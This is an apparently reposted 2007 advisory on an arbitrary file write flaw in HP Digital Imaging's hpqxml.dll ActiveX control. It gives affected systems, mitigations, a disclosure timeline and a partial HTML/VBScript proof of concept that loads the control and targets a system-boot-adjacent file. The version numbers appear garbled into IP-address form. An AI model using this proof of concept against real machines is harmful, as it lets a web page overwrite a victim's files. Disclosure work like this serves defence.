:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
hpqxml.dll 184.108.40.206 from HP Digital Imaging Arbitary Data Write
Internal ID: VULWAR200706275.
hpqxml.dll is a library included in the HP Photo Digital Imaging
software package from the HP Company. http://www.hp.com.
- Windows XP SP2 english/french with IE 6.0 / 7.0.
- Windows vista Professional English/French SP1 with IE 7.0
The saveXMLAsFile method doesn't check if it is being called from the application
or from a malicious user.
The vulnerability is due to an error in the saveXMLAsFile method that manipulate
local files insecurely, which could allow malicious users to write arbitrary
data to any file on a vulnerable system. Besides, the method does not check the
file headers before writing.
- Activate the Kill bit zero in clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3.
- Unregister hpqxml.dll using regsvr32.
June 27, 2007 -- Bug discovery.
June 27, 2007 -- Bug published.
* callAX <firstname.lastname@example.org>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
saveXMLAsFile method receives a filename as an argument, with this format "c:\path\file".
Proof of Concept
<title>Hpqxml.dll 220.127.116.11 HP Digital Imaging Arbitary Data Write</title>
<h3>Hpqxml.dll 18.104.22.168 HP Digital Imaging Arbitary Data Write</h3><br>
<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target' /></object>
<input language=VBScript onclick=HP() type=button value="Proof of Concept">
<script language = 'vbscript'>
filename = "C:\NTDETECT_.COM"
# milw0rm.com [2007-06-27]